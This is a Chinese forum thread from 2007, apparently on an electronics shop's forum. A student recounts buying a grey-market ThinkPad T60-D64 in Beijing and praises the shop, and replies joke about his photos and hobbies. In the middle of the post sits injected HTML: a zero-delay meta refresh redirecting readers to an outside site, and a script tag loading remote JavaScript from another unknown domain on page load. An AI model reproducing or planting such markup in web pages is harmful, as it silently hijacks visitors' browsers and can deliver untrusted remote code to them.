开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] [原创]T60-D64精彩手记(多图)wonderful experience~~

购机时间:2007-1
购机地点:北京-朝阳门-天辰
机器型号:T60-D64

小弟是河北工程大一的学生,开学的时候就想弄个本子,一直没有看到合适的,本来挺喜欢索尼,外观和屏幕不错,但是害怕哪一天宿舍的兄弟因为痛恨狗日的小鬼子而迁怒于它,所以就彻底放弃了索尼.
  其实要说小弟最喜欢的,那还是小黑子,好东西,没说的!以前上小学时老爹送过我一台,那时候什么也不懂,也不爱惜,天天看碟,被我折腾的够呛,漆掉了,键盘坏了,光驱也不行了.但是我相信如果换个戴尔或者联想什么的,恐怕早就报废了. 
  IBM售价高可能是人们崇尚他的另一个因素,对于我们这样的学生一族来说,花两万多块钱买台本子确实有些奢侈.前段时间在网上瞎逛无意发现了翔意,开始看售价的时候感觉翔意百分百骗子,天下哪有这么好的事情,两万多的东西到你这儿变一半了,甚至一半都不到。可是当我看了各位大哥的帖子后感觉这好像确实是真的,大家对翔意的赞美不胜言表,最后我才了解到什么叫水货,以及翔意物美价廉的原因。
    开始泡~~~~~~~~~~
    泡了好久~~~~~~~~~~

决定入手B14

B14停产了

改D64

我们学校在邯郸,坐火车三个小时,那天到京城是早晨六点,出来时天都黑的,出来去加州牛肉面吃了顿早餐,吃完七点多,天才蒙蒙亮,打上车直奔中关村,到海龙买了两支投影机灯泡,看了看表,九点二十,接着就去了朝阳门,在文化部下的车,一下就找到了天辰,给XY打了个电话,说正在营业.

进了XY就看见墙上挂都全都是电脑包,一个长发MM正在洗头,另一个挺精神的帅GG正在搞电脑,看我来了非常热情,也不管我是干什么的,先说请坐.XY看起来很宽敞很亮堂很干净,这时候从;里面走出一个大个子GG,当我说明来意后马上拿出来一台D64,挺精神的帅GG热情地帮我验机,我也没仔细看,就验了一下屏幕和电池,感觉不错,又要了一个双肩包,交完钱和大个子GG聊了一会.
    从入手到现在,小黑没出现过一点毛病,小弟可以很负责任的对各位说XY真的很值得信赖,以前我在邯郸买了一个水货手机,摩托的E680I,买了不到一天就出现了死机的现象,花钱让摩托维修点检查一下,人家只拿下了电池,就说组装机一个!呵呵,我也非常感谢XY,让我们这些学生都买的起世界级的NB.

+500---EddieFan
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

GF小白白

GF小白白

19和14.1对比

19和14.1对比

评分

EddieFan + 500

老大~~~~~加分啊

回家的路上

回家的路上

回家的路上

回家的路上
有没有搞错,家里这么有钱,美女是谁啊??
太有钱了,
投影机不错

再给大家发两张家乡的照片(新疆阿勒泰)

再给大家发两张家乡的照片(新疆阿勒泰)

让人魂牵梦绕的咯纳斯

让人魂牵梦绕的咯纳斯

神圣的祭祀(蒙古族)

神圣的祭祀(蒙古族)
高数教材还那么新,一个学期过去啦.
咯纳斯真美.
原帖由 T60CC1 于 2007-2-5 21:28 发表
高数教材还那么新,一个学期过去啦.

大哥慧眼识真,小弟惭愧,惭愧
嘿嘿~这位小兄弟也吹SAX啊!!!!太高兴了~我也忒喜欢sax的,不过吹得不好~
刚才看你的照片都忘了自己是在XY的论坛了,
开心~
真有钱
还顺便问一句
邯郸到北京3个小时??
什么车啊
lz 玩sax  哈哈 降E的
原帖由 grade_9 于 2007-2-5 22:55 发表
真有钱
还顺便问一句
邯郸到北京3个小时??
什么车啊

是4个小时

哈哈,不好意思,说错了

太有钱了
是降E的
  把旁边那本高数拿走!!   这辈子不想再看见
老大估计是高数挂了,呵呵。
有钱人呀
米人啊,想当年我上大学时还为每个月300的生活费发愁呢。也就是两年前的事,hoho,现在可以填饱肚子了。 买本本,奢望啊……
xy妹妹在工作室洗头??? 嘻嘻,想看看
ding
怎么看起来不像高分屏呀??
64不是1400*1050的分辨率么? 难道lz降分辨率了?(1024*768)?
又见米人